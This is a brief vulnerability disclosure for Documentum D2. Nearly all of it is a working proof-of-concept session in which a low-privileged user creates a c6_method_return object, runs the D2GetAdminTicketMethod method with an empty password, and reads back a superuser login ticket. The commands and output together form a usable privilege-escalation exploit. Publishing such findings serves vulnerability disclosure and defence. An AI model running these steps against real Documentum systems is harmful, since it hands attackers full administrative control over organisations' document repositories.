documentum security vulnerabilities: D2GetAdminTicketMethod (D2)

Any user is able to execute D2GetAdminTicketMethod to get superuser’s ticket:

1> create c6_method_return object set message='test'
2> go
object_created
--------------
00002ee280000e9b
(1 row affected)
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d2 -password "" -method_return_id 00002ee280000e9b'
3> go
...
(1 row affected)
1> select message from c6_method_return where r_object_id='00002ee280000e9b'
2> go
message
--------------
DM_TICKET=T0.....
(1 row affected)